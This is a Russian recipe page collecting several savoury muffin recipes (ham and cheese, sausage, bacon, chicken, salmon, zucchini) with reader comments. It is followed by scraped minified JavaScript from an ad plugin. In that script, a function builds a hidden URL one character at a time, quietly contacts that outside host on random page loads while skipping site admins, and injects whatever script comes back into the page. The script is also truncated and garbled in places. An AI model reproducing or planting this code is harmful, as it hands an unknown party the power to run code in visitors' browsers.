Маффины с сыром и ветчиной

Маффины с ветчиной и сыром

Воздушные домашние маффины с ветчиной и сыром — идеальное дополнение к закускам на фуршете, качественный перекус к чаю и другим напиткам, а также удобная выпечка для долгих прогулок на свежем воздухе.

Ингредиенты

Чтобы испечь вкусные маффины с ветчиной и сыром, возьмите продукты по списку. Кстати, мясные изделия запросто менять. Например, тут уместны кусочки копченостей, охотничьих колбасок, молочных сосисок и всяких колбас.

Начинаем с замеса теста. Сперва взбиваем яйца, сахарный песок и соль. Для усиления вкуса можно включить пряные ароматизаторы. Взбалтываем ручным венчиком до полного объединения компонентов.

Отделять белки и взбивать до пиков нет необходимости, разрыхлитель справится в полной мере с подъемом и пышностью теста.

Дальше вливаем молоко (или кефир, жидкие молочные сливки — на выбор), прибавляем постное рафинированное масло (кукурузное или подсолнечное) и продолжаем быстрые круговые движения. Все просто и быстро.

К однородной жидкой смеси всыпаем муку с порцией разрыхлителя. Месим, удаляя сухие участки и комки. Получаем консистенцию густой сметаны.

Теперь бросаем добавки: кусочки ветчины и твердого сыра. Перемешиваем. Примерно треть сыра оставляем в стороне для сырной корочки.

Выкладываем по две столовые ложки теста в ячейки для порционных кексов/маффинов. Выпекаем в предварительно раскаленной духовке около 25 минут при температуре 190 градусов, не открывая дверцу.

Вздувшиеся закусочные маффины сверху посыпаем остатками сыра (стружкой) и возвращаем в печь на следующие 5-10 минут, до расплавления сырного слоя.

Остужаем мини-кексы на решетке. Для хранения упаковываем в пищевой пакет или контейнер.

Подаем аппетитные маффины на стол к супам, салатам и напиткам.

Ну Вилкин, ну молодец. Всегда что то такое бросит, что непременно хочется попробовать! А когда рабочий день ты просто с ума сойдешь пока до дома доберешься!
Так со мной и случилось! Сделала я эти чарующие маффины, принесла на пробу коллегам. Все оценили по высшему баллу!
Тесто прекрасно пропекается, начинку буду менять. Кто заменял ветчину и на что.

Существует 2 вида. Американские и Английские. Я знаю отличный рецепт шоколадных маффинов. Для приготовления нам понадобиться:
— 200 гр муки;
— 100 гр масла;
— 100 гр сахара;
— 3 яйца;
— 2 ч.л. разрыхлителя;
— 3/4 ч.л. ванилина;
— 2 ст.л. какао;
— 100 гр. шоколада.
Маффины можно заправлять орехами.

Кексы с ветчиной и сыром в формочках

На 23 февраля я приготовила кексы с сыром и ветчиной в формочках. Мужчины были приятно удивлены такому подарку. Закусочные кексы получились очень красивыми, вкусными и сытными. Украсить их решила творожным сыром с зеленью и розочками из слабосолёной сёмги. Попробуйте приготовить закусочные кексы по этому рецепту и, я уверена, они вам понравятся.

Ингредиенты

Процесс приготовления

Сливочное масло заранее достать из холодильника и оставить при комнатной температуре. Масло должно стать мягким. Выложить масло в миску, добавить черный молотый перец, сахар и соль.

С помощью миксера взбить масло в течение 3-4 минут.

Затем к взбитому маслу добавить одно яйцо, взбить массу до однородности. Добавить второе яйцо и опять хорошо взбить массу.

Всыпать 100 грамм просеянной пшеничной муки, разрыхлитель.

На низкой скорости миксера перемешать тесто, затем добавить половину молока и снова перемешать.

Далее добавить остатки муки и молока, ещё раз хорошо перемешать миксером на низких оборотах. Тесто получится очень воздушным и нежным.

Ветчину и сыр нарезать на небольшие кубики.

Нарезанные сыр и ветчину выложить в тесто.

Тесто тщательно перемешать ложкой.

Тесто разложить по формочках, заполняя формы на 2/3 их объёма. Я использовала бумажные вкладыши, поэтому формочки ничем не смазывала. Если вы планируете выпекать кексы с сыром и ветчиной в железных формочках, то перед выкладыванием теста смажьте их сливочным маслом. Из указанного количества ингредиентов, в зависимости от размера формочек, получится 9-12 закусочных кексов.

Выпекать закусочные кексы с ветчиной и сыром в разогретой духовке минут 30 при температуре 200 градусов. Кексики в процессе выпечки хорошо поднимутся, а при остывании немного опадут. Готовые кексы немного остудить и можно подавать к столу. Я же решила украсить остывшие готовые кексы.

Для украшения я взяла мягкий творожный сыр с зеленью.

Сыр предварительно достать из холодильника (где-то за час до украшения выпечки). В кондитерский мешок с фигурной насадкой выложить творожный сыр.

Отсадить сыр на кексики.

Тонкие ломтики сёмги свернуть в рулетик и вставить в середину сырной шапочки. Украсить закусочные кексы веточкой укропа и сухими пряностями.

Если вам надоели простые закуски и вы захотите разнообразить праздничный стол, то такие кексики будет очень кстати. Вот какие красивые и очень вкусные закусочные кексы с ветчиной и сыром получились.

Маффины с ветчиной и сыром – праздничное блюдо быстрого приготовления

Маффины – порционное блюдо, выпекаемое в духовке. В нашей стране их принято называть кексами. Всем привычны сладкие варианты этого блюда – шоколадный, ванильный или с изюмом, но можно готовить и с другими начинками, чтобы разнообразить меню.

Маффины с ветчиной и сыром, с рыбой, мясом, беконом или колбасой станут оригинальной альтернативой пирожкам или пицце. А готовится это блюдо быстро, и для него не нужно сложных ингредиентов – все уже есть в холодильнике.

Сытный завтрак

Этим блюдом можно побаловать домочадцев и угостить неожиданно зашедших друзей.

Маффины с ветчиной и сыром

  • Ветчина – 100 граммов;
  • Сыр (предпочтительнее твердый сорт) – 100 г;
  • Молоко – 150 мл;
  • Сливочное масло – 100 граммов;
  • Яйца – 3 шт;
  • Мука – 300 г;
  • Разрыхлитель – 1 ч.л.
  1. Ветчину и сыр порезать маленькими кубиками;
  2. Яйца взбить, для пикантности можно добавить паприку или душистый перец;
  3. Влить молоко;
  4. Добавить мягкое масло;
  5. Высыпать муку и разрыхлитель. Вместо разрыхлителя можно добавить ложечку гашеной соды;
  6. Замесить тесто, всыпать начинку. Размешать. Долго месить не требуется. Тесто по консистенции должно походить на сметану;
  7. Духовку разогреть до 180 °C;
  8. Тесто разложить в формочки для кексов. Тесто накладывать чуть больше половины объема, потому что при выпечке оно поднимается;
  9. Время выпечки около 30 минут;
  10. Зубочисткой проверить готовность продукта.

Такое блюдо можно подать в выходной день к завтраку. Пока домочадцы умываются, а чайник закипает, вкусный горячий завтрак будет уже готов.

Маффины с колбасой

Вместо ветчины можно приготовить с колбасой, сосисками или беконом. Используя разные сорта колбас, всегда получается новый вкус.

  • Копченая колбаса — 50 г;
  • Вареная колбаса (сосиска) — 50 г;
  • Сыр — 100 г;
  • Мука – 300 г;
  • Яйца – 3 шт;
  • Масло – 100 г;
  • Разрыхлитель – 2 ч.л;
  • Молоко – 150 мл;
  • Немного зелени.

  1. В чашке взбить яйца;
  2. Добавить размягченное масло, молоко;
  3. Всыпать муку с разрыхлителем. Замесить негустое тесто;
  4. Добавить порезанные кубиками колбасы и зелень с сыром;
  5. Разложить по формочкам, выпекать в разогретой до 180°C духовке в течение получаса.

Это блюдо подается, как сытный завтрак или как дополнение к обеду. А можно преподнести, как закуску к праздничному столу.

Молоко можно заменить кисломолочными продуктами и приготовить нежные маффины с колбасой и сыром на кефире, используя то же количество продуктов, что и в данном рецепте.

Маффины с беконом и сыром

  • Мука – 150 г;
  • Копченый бекон – 3 пластинки;
  • Разрыхлитель;
  • Сыр – 50 г;
  • Порошок горчицы – 1 ч.л;
  • Яйцо – 1 шт;
  • Молоко – 125 мл.
  1. Бекон обжарить на сухой сковороде до хрустящей корочки, выложить на салфетку, чтобы лишний жир стек;
  2. Духовку включить заранее, потому что тесто готовится быстро. Разогреть ее до 180°C;
  3. Взбить яйцо с кусочками бекона и молоком. Можно добавить перец и несколько крупинок соли;
  4. В чашке смешать муку, разрыхлитель, горчичный порошок. Натереть сыр. В этом рецепте лучше использовать чеддер, потому что он дарит потрясающий вкус;
  5. Смешать яйца и мучную смесь. Долго месить не нужно, иначе тесто станет « резиновым »;
  6. Разложить по мини-формочкам. Если нет маленьких форм, можно использовать обычные. Вкус от этого не изменится, но время приготовления увеличится;
  7. Можно посыпать сверху маффины тертым сыром перед отправкой в духовку. Сырная корочка будет пикантным украшением праздничных маффинов с беконом;
  8. Выпекать минут 12, подавать к столу теплыми.

В результате выходит 24 мини-кекса.

Куриные маффины

Если в холодильнике осталась вареная курица, ее можно использовать для приготовления вкусного и нежного блюда – маффины с курицей и сыром.

  • Мука – 1,5 ст;
  • Молоко – 200 мл;
  • Яйца – 2 шт;
  • Разрыхлитель — 2 ч.л;
  • Масло — 100 г;
  • Вареная курица — 100 г;
  • Сыр – 100 г;
  • Зелень.
  1. В чашке смешать все ингредиенты.
  2. Добавить порезанную на мелкие кусочки курицу и сыр, а также рубленую зелень.
  3. Все ингредиенты как следует размешать и переложить в формочки.
  4. Выпекать до золотистой корочки.

Куриные маффины с сыром – идеальный рецепт для рачительных хозяек.

Рыбные маффины

В роли начинки может быть и рыба — соленая или копченая. Очень вкусны маффины с семгой и сыром.

  • Молоко – 150 мл;
  • Мука – 130 г;
  • Разрыхлитель – половина чайной ложки;
  • Слабосоленая семга – 100 г;
  • Масло растительное – 50 мл;
  • Половина лимона;
  • Яйцо – 1 ч.л;
  • Укроп.
  1. Яйца взбиваются с молоком, растительным маслом и соком половинки лимона.
  2. Муку смешать с разрыхлителем, вмешать в яичную смесь.
  3. Рыбу порезать кусочками, натереть цедру половины лимона, добавить укроп и душистый перчик.
  4. Все хорошенько размешать и разложить в формочки.
  5. Выпекать при 180°C около 20 минут.

Эти ароматные кексы не оставят равнодушными никого. Особенно хороши они в теплом виде со сливочным маслицем. Просто тают во рту!

Овощные маффины

Лето – пора овощей, и хозяйки стараются по максимуму использовать их, чтобы запастись живыми витаминами на долгую зиму. Любители кабачков могут попробовать маффины из кабачков с сыром.

  • Кабачок -250 мл;
  • Сметана – половина стакана;
  • Сыр – 100 г;
  • Яйца – 2 шт;
  • Зелень;
  • Мука – 3 ст.л;
  • Чеснок – 2 зубчика;
  • Сода – половина чайной ложки;
  • Лук – немного для вкуса.
  1. Натереть кабачок на терке, немного посолить и дать постоять, чтобы выделился сок. После этого кабачковую массу нужно отжать.
  2. Лук и зелень порубить. Чеснок выдавить через чеснокодавку и смешать с кабачками.
  3. Добавить остальные продукты. Вымешать. Дать настояться минут 20, чтобы тесто обогатилось ароматом чеснока и укропа.
  4. Выпекать в духовке в формочках для кексов около получаса.

Подавать маффины из кабачков можно со сметаной, кетчупом или майонезом. Этот рецепт – вариация на тему драников, но более полезный, ведь маффины не нужно жарить в масле.

Хитрости приготовления

  • В рецептах часто используется сливочное масло. Сочетание колбасы, сыра и масла довольно калорийно. Чтобы снизить калорийность готового продукта, можно использовать растительное масло, в указанном количестве.
  • Можно приготовить маффины с сыром, исключив из рецепта мясные ингредиенты.
  • Если формы силиконовые, то их смазывать нет необходимости. А вот металлические формы нужно смазать маслом, чтобы впоследствии легко вынуть маффины, или использовать бумажные вкладыши.
  • Формы для маффинов заполнять нужно чуть больше половины объема. Тесто будет подниматься в духовке.
  • Можно смело экспериментировать с начинками. Для сочности добавить порезанный сладкий перец, кукурузу, зеленый горошек, соленые огурчики.
  • Секрет вкусных маффинов в том, что сухие ингредиенты смешиваются отдельно, а жидкие – отдельно. Потом все перемешивается вместе и добавляется начинка.
  • Для замешивания теста лучше использовать венчик или ложку, но не миксер. Маффины не любят длительного замешивания. Размешал, разложил по формам – и в духовку! Быстро, вкусно, питательно.

Маффины блюдо оригинальное и простое в приготовлении. Оно не требует сложной подготовки. Все продукты смешиваются в одной миске и выпекаются в течение получаса.

Как приготовить маффины с ветчиной и сыром по пошаговому рецепту и фото

Не так давно я попробовала рецепт отличной выпечки – маффины. И была просто поражена открывшимися передо мной возможностями. Как оказалось, маффины бывают не только сладкими и фруктовыми. Можно делать закусочные маффины с самыми разными наполнителями. И, проведя на своей кухни ряд экспериментов, я выявила самые вкусные, удобные, простые варианты рецептов для своей семьи. Эти небольшие изделия просто очаровали нас своей универсальностью – можно проглотить на бегу вместо завтрака, можно выставить на стол в качестве ужина, а если постараться и приукрасить – будет в самый раз для праздничного застолья.

Предлагаю 2 рецепта приготовления маффинов: они немного похожи, но вкус все-таки разный.

Рецепт маффинов с колбасой и сыром

Ингредиенты

Сыр твердый 120 г
Колбаса 120 г
Масло сливочное 120 г
Мука 280 г
Яйца 3 шт.
Разрыхлитель 15 г
Молоко 150 мл
Соль по вкусу
Перец по вкусу

Масло должно быть совсем мягким, поэтому заранее достаем его из холодильника. Колбаса и сыр – любые.

Приготовление маффинов с сыром и колбасой

  1. Яйца взбиваем с солью и перцем.
  2. Вливаем молоко, кладем масло и тщательно перемешиваем.
  3. Сыр и колбасу нарезаем небольшими кубиками.
  4. Закладываем нарезку в яичную смесь.
  5. Всыпаем муку и разрыхлитель, все хорошенько размешиваем.
  6. Формы для кексов заполняем тестом, немного не доходя до верха.
  7. Ставим в разогретую до 180° духовку на полчаса.

Видео о приготовлении маффинов с сыром и колбасой

Пошаговый видеорецепт маффинов с добавлением колбасы и сыра.

Рецепт сырных маффинов с ветчиной

Ингредиенты

Сыр твердый 100 г
Ветчина 100 г
Масло растительное 30 г
Мука 220 г
Яйца 2 шт.
Разрыхлитель 10 г
Молоко 220 мл
Зеленый лук по вкусу

Приготовление сырных маффинов

  1. В молоко вливаем масло, разбиваем яйца, все это хорошенько взбиваем.
  2. Натираем на мелкой терке сыр и всыпаем его в молочную смесь.
  3. Ветчину нарезаем длинными тонкими полосками и отправляем туда же.
  4. Высыпаем нарезанный зеленый лук.
  5. Засыпаем в смесь разрыхлитель и муку. Аккуратно перемешиваем.
  6. Раскладываем тесто в формочки, заполняя их не до верха.
  7. Выпекаем минут 40 в духовке при температуре 180 градусов.

Видео рецепта приготовления сырных маффинов с ветчиной

Мастер-класс приготовления несладких сырных маффинов с добавлением ветчины.

При необходимости маффины можно украсить – например, перед выпечкой посыпать кунжутом, или, вынув из духовки, украсить орехами или семечками. Красиво будет смотреться на них красная, черная икра или капли густого соуса.

Полезные советы

По предлагаемым рецептам становится понятно, что многие ингредиенты можно смело заменять – вместо колбасы порезать сосиски или копченое мясо, или смесь колбас, или вообще воспользоваться мясным фаршем. Можно половину сыра натереть, а половину – нарезать кубиками. Можно смело добавлять мелко порезанную зелень – укроп, петрушку или что-то еще, что любите лично вы. Можно готовить —маффины на кефире— или сметане, а не на молоке. Думаю, для кого-то будет удобнее попробовать рецепт маффинов в микроволновке.

В общем, в таких универсальных рецептах импровизация только приветствуется. Для тех, кто никогда не делал такую выпечку, разумно будет оттолкнуться от классического рецепта маффинов – и дальше уже фантазировать, как угодно. И рекомендую обязательно попробовать великолепные рецепты банановых, лимонных и апельсиновых маффинов – это просто сказка!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};